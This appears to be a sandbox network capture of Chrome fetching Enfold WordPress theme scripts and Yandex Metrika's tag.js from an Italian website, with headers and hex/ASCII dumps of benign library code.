                                                                                                                                              2025-01-03 16:33:05 UTC15351INData Raw: 09 63 75 72 72 65 6e 74 09 09 09 3d 20 4d 61 74 68 2e 66 6c 6f 6f 72 28 74 68 69 73 2e 24 73 6c 69 64 65 72 55 6c 2e 68 65 69 67 68 74 28 29 29 2c 0a 09 09 09 09 72 61 74 69 6f 09 09 09 3d 20 73 6c 69 64 65 2e 64 61 74 61 28 27 76 69 64 65 6f 2d 72 61 74 69 6f 27 29 2c 0a 09 09 09 09 73 65 74 54 6f 20 20 20 09 09 3d 20 72 61 74 69 6f 20 3f 20 74 68 69 73 2e 24 73 6c 69 64 65 72 55 6c 2e 77 69 64 74 68 28 29 20 2f 20 72 61 74 69 6f 20 3a 20 4d 61 74 68 2e 66 6c 6f 6f 72 28 73 6c 69 64 65 2e 68 65 69 67 68 74 28 29 29 2c 0a 09 09 09 09 76 69 64 65 6f 5f 68 65 69 67 68 74 20 09 3d 20 73 6c 69 64 65 2e 64 61 74 61 28 27 76 69 64 65 6f 2d 68 65 69 67 68 74 27 29 2c 20 2f 2f 66 6f 72 63 65 64 20 76 69 64 65 6f 20 68 65 69 67 68 74 20 25 2e 20 6e 65 65 64 73 20
                                                                                                                                              Data Ascii: current= Math.floor(this.$sliderUl.height()),ratio= slide.data('video-ratio'),setTo = ratio ? this.$sliderUl.width() / ratio : Math.floor(slide.height()),video_height = slide.data('video-height'), //forced video height %. needs


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              107192.168.2.164983589.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:05 UTC489OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/gallery/gallery.js?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c
                                                                                                                                              2025-01-03 16:33:05 UTC276INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:05 GMT
                                                                                                                                              Content-Type: text/javascript
                                                                                                                                              Content-Length: 2497
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:30 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:05 UTC2497INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 24 29 0a 7b 20 0a 09 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 09 0a 09 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 09 2f 2f 20 47 61 6c 6c 65 72 79 20 73 68 6f 72 74 63 6f 64 65 20 6a 61 76 61 73 63 72 69 70 74 0a 09 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d
                                                                                                                                              Data Ascii: (function($){ "use strict";// -------------------------------------------------------------------------------------------// Gallery shortcode javascript// -----------------------------------------------------------------------------------------


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              108192.168.2.164983689.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:05 UTC672OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/portfolio/isotope.js?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c
                                                                                                                                              2025-01-03 16:33:05 UTC277INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:05 GMT
                                                                                                                                              Content-Type: text/javascript
                                                                                                                                              Content-Length: 49143
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:31 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:05 UTC16107INData Raw: 2f 2a 21 0a 20 2a 20 49 73 6f 74 6f 70 65 20 50 41 43 4b 41 47 45 44 20 76 33 2e 30 2e 35 0a 20 2a 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 47 50 4c 76 33 20 66 6f 72 20 6f 70 65 6e 20 73 6f 75 72 63 65 20 75 73 65 0a 20 2a 20 6f 72 20 49 73 6f 74 6f 70 65 20 43 6f 6d 6d 65 72 63 69 61 6c 20 4c 69 63 65 6e 73 65 20 66 6f 72 20 63 6f 6d 6d 65 72 63 69 61 6c 20 75 73 65 0a 20 2a 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 69 73 6f 74 6f 70 65 2e 6d 65 74 61 66 69 7a 7a 79 2e 63 6f 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 37 20 4d 65 74 61 66 69 7a 7a 79 0a 20 2a 2f 0a 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 6a 71
                                                                                                                                              Data Ascii: /*! * Isotope PACKAGED v3.0.5 * * Licensed GPLv3 for open source use * or Isotope Commercial License for commercial use * * https://isotope.metafizzy.co * Copyright 2017 Metafizzy */!function(t,e){"function"==typeof define&&define.amd?define("jq
                                                                                                                                              2025-01-03 16:33:05 UTC16384INData Raw: 72 4c 61 79 6f 75 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 21 74 2e 69 73 49 67 6e 6f 72 65 64 7d 29 7d 2c 63 2e 5f 6c 61 79 6f 75 74 49 74 65 6d 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 69 66 28 74 68 69 73 2e 5f 65 6d 69 74 43 6f 6d 70 6c 65 74 65 4f 6e 49 74 65 6d 73 28 22 6c 61 79 6f 75 74 22 2c 74 29 2c 74 26 26 74 2e 6c 65 6e 67 74 68 29 7b 76 61 72 20 69 3d 5b 5d 3b 74 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6f 3d 74 68 69 73 2e 5f 67 65 74 49 74 65 6d 4c 61 79 6f 75 74 50 6f 73 69 74 69 6f 6e 28 74 29 3b 6f 2e 69 74 65 6d 3d 74 2c 6f 2e 69 73 49 6e 73 74 61 6e 74 3d 65 7c 7c 74 2e 69 73 4c 61 79 6f 75 74
                                                                                                                                              Data Ascii: rLayout=function(t){return t.filter(function(t){return!t.isIgnored})},c._layoutItems=function(t,e){if(this._emitCompleteOnItems("layout",t),t&&t.length){var i=[];t.forEach(function(t){var o=this._getItemLayoutPosition(t);o.item=t,o.isInstant=e||t.isLayout
                                                                                                                                              2025-01-03 16:33:05 UTC16384INData Raw: 74 65 6d 73 53 6f 72 74 44 61 74 61 28 65 29 7d 2c 6c 2e 5f 67 65 74 53 6f 72 74 65 72 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 67 65 74 53 6f 72 74 44 61 74 61 3b 66 6f 72 28 76 61 72 20 65 20 69 6e 20 74 29 7b 76 61 72 20 69 3d 74 5b 65 5d 3b 74 68 69 73 2e 5f 73 6f 72 74 65 72 73 5b 65 5d 3d 66 28 69 29 7d 7d 2c 6c 2e 5f 75 70 64 61 74 65 49 74 65 6d 73 53 6f 72 74 44 61 74 61 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 26 26 74 2e 6c 65 6e 67 74 68 2c 69 3d 30 3b 65 26 26 69 3c 65 3b 69 2b 2b 29 7b 76 61 72 20 6f 3d 74 5b 69 5d 3b 6f 2e 75 70 64 61 74 65 53 6f 72 74 44 61 74 61 28 29 7d 7d 3b 76 61 72 20 66 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20
                                                                                                                                              Data Ascii: temsSortData(e)},l._getSorters=function(){var t=this.options.getSortData;for(var e in t){var i=t[e];this._sorters[e]=f(i)}},l._updateItemsSortData=function(t){for(var e=t&&t.length,i=0;e&&i<e;i++){var o=t[i];o.updateSortData()}};var f=function(){function
                                                                                                                                              2025-01-03 16:33:05 UTC268INData Raw: 2e 5f 67 65 74 4f 70 74 69 6f 6e 28 22 68 6f 72 69 7a 6f 6e 74 61 6c 22 29 3f 74 68 69 73 2e 6e 65 65 64 73 56 65 72 74 69 63 61 6c 52 65 73 69 7a 65 4c 61 79 6f 75 74 28 29 3a 69 2e 63 61 6c 6c 28 74 68 69 73 29 7d 3b 76 61 72 20 6a 3d 64 2e 5f 67 65 74 4f 70 74 69 6f 6e 3b 72 65 74 75 72 6e 20 64 2e 5f 67 65 74 4f 70 74 69 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 22 68 6f 72 69 7a 6f 6e 74 61 6c 22 3d 3d 61 3f 76 6f 69 64 20 30 21 3d 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 69 73 48 6f 72 69 7a 6f 6e 74 61 6c 3f 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 69 73 48 6f 72 69 7a 6f 6e 74 61 6c 3a 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 68 6f 72 69 7a 6f 6e 74 61 6c 3a 6a 2e 61 70 70 6c 79 28 74 68 69 73 2e 69 73 6f 74 6f 70 65 2c 61 72 67
                                                                                                                                              Data Ascii: ._getOption("horizontal")?this.needsVerticalResizeLayout():i.call(this)};var j=d._getOption;return d._getOption=function(a){return"horizontal"==a?void 0!==this.options.isHorizontal?this.options.isHorizontal:this.options.horizontal:j.apply(this.isotope,arg


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              109192.168.2.164983789.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:05 UTC511OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/gallery_horizontal/gallery_horizontal.js?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c
                                                                                                                                              2025-01-03 16:33:05 UTC276INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:05 GMT
                                                                                                                                              Content-Type: text/javascript
                                                                                                                                              Content-Length: 5081
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:30 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:05 UTC5081INData Raw: 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 2f 2f 20 48 6f 72 69 7a 6f 6e 74 61 6c 20 47 61 6c 6c 65 72 79 0a 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 0a 28 66 75 6e 63 74 69 6f 6e 28 24 29 0a 7b 20 0a 09 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 0a 09 24 2e 66 6e 2e 61 76 69 61
                                                                                                                                              Data Ascii: // -------------------------------------------------------------------------------------------// Horizontal Gallery// -------------------------------------------------------------------------------------------(function($){ "use strict";$.fn.avia


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              110192.168.2.164984289.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:05 UTC686OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/masonry_entries/masonry_entries.js?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c
                                                                                                                                              2025-01-03 16:33:05 UTC276INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:05 GMT
                                                                                                                                              Content-Type: text/javascript
                                                                                                                                              Content-Length: 8056
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:31 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:05 UTC8056INData Raw: 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 2f 2f 20 4d 61 73 6f 6e 72 79 0a 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 0a 28 66 75 6e 63 74 69 6f 6e 28 24 29 0a 7b 20 0a 09 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 0a 09 24 2e 66 6e 2e 61 76 69 61 5f 6d 61 73 6f 6e 72 79 20 3d 20
                                                                                                                                              Data Ascii: // -------------------------------------------------------------------------------------------// Masonry// -------------------------------------------------------------------------------------------(function($){ "use strict";$.fn.avia_masonry =


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              111192.168.2.164984187.250.251.1194436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:05 UTC512OUTGET /metrika/tag.js HTTP/1.1
                                                                                                                                              Host: mc.yandex.ru
                                                                                                                                              Connection: keep-alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: i=MWn/b3CGBdGz4xwo6ybs8zuB0m6dqTWEZs6SfrZEPLGuS1njVyPf5dksYDS0w6MqEEVqybkB7y6BVJBOmOuiQIuKgyY=; yandexuid=5258352291735921983; yashr=2056106971735921983
                                                                                                                                              2025-01-03 16:33:05 UTC851INHTTP/1.1 200 OK
                                                                                                                                              Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                              Cache-Control: max-age=3600
                                                                                                                                              Connection: Close
                                                                                                                                              Content-Length: 227261
                                                                                                                                              Content-Type: application/javascript
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:05 GMT
                                                                                                                                              ETag: "67655eba-377bd"
                                                                                                                                              Expires: Fri, 03 Jan 2025 17:33:05 GMT
                                                                                                                                              Last-Modified: Fri, 20 Dec 2024 12:10:34 GMT
                                                                                                                                              Set-Cookie: _yasc=QjInaYJGpHUgZ3WWavYLqMiq5G/fjR0ShJtOaPaEvue6UU+Wx+52e1lzcZQ92B4hxjo=; domain=.yandex.ru; path=/; expires=Mon, 01 Jan 2035 16:33:05 GMT; secure
                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                              Timing-Allow-Origin: *
                                                                                                                                              2025-01-03 16:33:05 UTC1757INData Raw: ef bb bf 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 4c 61 28 62 61 29 7b 76 61 72 20 74 61 3d 30 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 61 3c 62 61 2e 6c 65 6e 67 74 68 3f 7b 64 6f 6e 65 3a 21 31 2c 76 61 6c 75 65 3a 62 61 5b 74 61 2b 2b 5d 7d 3a 7b 64 6f 6e 65 3a 21 30 7d 7d 7d 66 75 6e 63 74 69 6f 6e 20 75 28 62 61 29 7b 76 61 72 20 74 61 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 26 26 62 61 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3b 69 66 28 74 61 29 72 65 74 75 72 6e 20 74 61 2e 63 61 6c 6c 28 62 61 29 3b 69 66 28 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 62 61 2e 6c 65 6e 67 74 68
                                                                                                                                              Data Ascii: (function(){function La(ba){var ta=0;return function(){return ta<ba.length?{done:!1,value:ba[ta++]}:{done:!0}}}function u(ba){var ta="undefined"!=typeof Symbol&&Symbol.iterator&&ba[Symbol.iterator];if(ta)return ta.call(ba);if("number"==typeof ba.length
                                                                                                                                              2025-01-03 16:33:05 UTC8168INData Raw: 2e 69 64 7c 7c 57 61 28 5a 28 22 49 6e 76 61 6c 69 64 20 4d 65 74 72 69 6b 61 20 69 64 3a 20 22 2b 0a 6d 2e 69 64 2c 21 30 29 29 3b 76 61 72 20 74 3d 77 64 2e 43 28 22 63 6f 75 6e 74 65 72 73 22 2c 7b 7d 29 3b 69 66 28 74 5b 6c 5d 29 72 65 74 75 72 6e 20 71 3d 7b 7d 2c 50 62 28 6b 2c 6c 2c 22 64 63 22 2c 28 71 2e 6b 65 79 3d 6c 2c 71 29 29 2c 74 5b 6c 5d 3b 74 5b 6c 5d 3d 65 3b 77 64 2e 44 28 22 63 6f 75 6e 74 65 72 73 22 2c 74 29 3b 77 64 2e 73 61 28 22 63 6f 75 6e 74 65 72 22 2c 65 29 3b 7a 28 66 75 6e 63 74 69 6f 6e 28 76 29 7b 76 28 6b 2c 6d 29 7d 2c 52 66 29 3b 7a 28 66 2c 7a 65 29 3b 66 28 4d 6d 29 3b 68 28 4e 6d 28 6b 2c 6d 2c 70 29 2c 22 64 65 73 74 72 75 63 74 22 2c 5b 74 61 2c 24 61 5d 29 3b 64 63 28 6b 2c 46 28 5b 6b 2c 71 2c 66 2c 31 2c 22 61
                                                                                                                                              Data Ascii: .id||Wa(Z("Invalid Metrika id: "+m.id,!0));var t=wd.C("counters",{});if(t[l])return q={},Pb(k,l,"dc",(q.key=l,q)),t[l];t[l]=e;wd.D("counters",t);wd.sa("counter",e);z(function(v){v(k,m)},Rf);z(f,ze);f(Mm);h(Nm(k,m,p),"destruct",[ta,$a]);dc(k,F([k,q,f,1,"a
                                                                                                                                              2025-01-03 16:33:05 UTC8168INData Raw: 74 75 72 6e 20 65 3c 63 3b 63 61 73 65 20 22 3c 3d 22 3a 72 65 74 75 72 6e 20 65 3c 3d 63 3b 63 61 73 65 20 22 3e 22 3a 72 65 74 75 72 6e 20 65 3e 63 3b 63 61 73 65 20 22 3e 3d 22 3a 72 65 74 75 72 6e 20 65 3e 3d 63 3b 63 61 73 65 20 22 3c 3c 22 3a 72 65 74 75 72 6e 20 65 3c 3c 63 3b 63 61 73 65 20 22 3e 3e 22 3a 72 65 74 75 72 6e 20 65 3e 3e 63 3b 63 61 73 65 20 22 3e 3e 3e 22 3a 72 65 74 75 72 6e 20 65 3e 3e 3e 63 3b 63 61 73 65 20 22 2b 22 3a 72 65 74 75 72 6e 20 65 2b 63 3b 63 61 73 65 20 22 2d 22 3a 72 65 74 75 72 6e 20 65 2d 63 3b 63 61 73 65 20 22 2a 22 3a 72 65 74 75 72 6e 20 65 2a 63 3b 63 61 73 65 20 22 2f 22 3a 72 65 74 75 72 6e 20 65 2f 63 3b 63 61 73 65 20 22 25 22 3a 72 65 74 75 72 6e 20 65 25 63 3b 63 61 73 65 20 22 7c 22 3a 72 65 74 75 72
                                                                                                                                              Data Ascii: turn e<c;case "<=":return e<=c;case ">":return e>c;case ">=":return e>=c;case "<<":return e<<c;case ">>":return e>>c;case ">>>":return e>>>c;case "+":return e+c;case "-":return e-c;case "*":return e*c;case "/":return e/c;case "%":return e%c;case "|":retur
                                                                                                                                              2025-01-03 16:33:05 UTC8168INData Raw: 74 69 73 65 72 44 6f 6d 61 69 6e 73 3d 62 29 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 71 69 28 61 2c 62 29 7b 61 2e 4c 63 5b 62 5d 7c 7c 28 61 2e 4c 63 5b 62 5d 3d 7b 46 62 3a 7b 7d 7d 29 3b 72 65 74 75 72 6e 20 61 2e 4c 63 5b 62 5d 7d 66 75 6e 63 74 69 6f 6e 20 4a 6e 28 61 2c 62 29 7b 7a 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 74 63 5b 63 5d 2e 62 61 26 26 4b 6e 28 61 2c 62 2c 63 29 7d 2c 6c 61 28 74 63 29 29 7d 66 75 6e 63 74 69 6f 6e 20 4b 6e 28 61 2c 62 2c 63 29 7b 76 61 72 20 64 3d 74 63 5b 63 5d 3b 64 2e 62 61 3d 21 31 3b 64 2e 50 61 26 26 72 61 28 61 2c 64 2e 50 61 29 3b 64 2e 50 61 3d 58 28 61 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 4c 6e 28 63 29 2c 66 3d 7b 7d 2c 67 3d 7b 7d 3b 62 28 28 67 2e 5f 5f 79 6d 3d 28 66 2e 70 62 6a 73 76 3d 70
                                                                                                                                              Data Ascii: tiserDomains=b))}}function qi(a,b){a.Lc[b]||(a.Lc[b]={Fb:{}});return a.Lc[b]}function Jn(a,b){z(function(c){tc[c].ba&&Kn(a,b,c)},la(tc))}function Kn(a,b,c){var d=tc[c];d.ba=!1;d.Pa&&ra(a,d.Pa);d.Pa=X(a,function(){var e=Ln(c),f={},g={};b((g.__ym=(f.pbjsv=p
                                                                                                                                              2025-01-03 16:33:05 UTC8168INData Raw: 72 20 66 3d 21 21 64 2e 5f 69 6e 66 6f 72 6d 65 72 3b 64 2e 5f 69 6e 66 6f 72 6d 65 72 3d 41 28 7b 64 6f 6d 61 69 6e 3a 22 69 6e 66 6f 72 6d 65 72 2e 79 61 6e 64 65 78 2e 72 75 22 7d 2c 63 29 3b 66 7c 7c 4b 65 28 61 2c 7b 73 72 63 3a 65 2b 22 2f 2f 69 6e 66 6f 72 6d 65 72 2e 79 61 6e 64 65 78 2e 72 75 2f 6d 65 74 72 69 6b 61 2f 69 6e 66 6f 72 6d 65 72 2e 6a 73 22 7d 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 78 6f 28 61 2c 62 29 7b 76 61 72 20 63 3d 69 62 28 61 29 2c 64 3d 63 2e 43 2c 65 3d 63 2e 44 3b 69 66 28 22 22 3d 3d 3d 64 28 22 63 63 22 29 29 7b 65 28 22 63 63 22 2c 30 29 3b 76 61 72 20 66 3d 6e 61 28 61 29 2c 67 3d 4b 28 61 29 3b 76 61 28 61 2c 22 36 22 2c 62 29 28 7b 4e 3a 7b 63 62 3a 21 30 2c 5a 63 3a 21 31 7d 7d 2c 5b 22 68 74 74 70 73 3a 2f 2f 6d 63
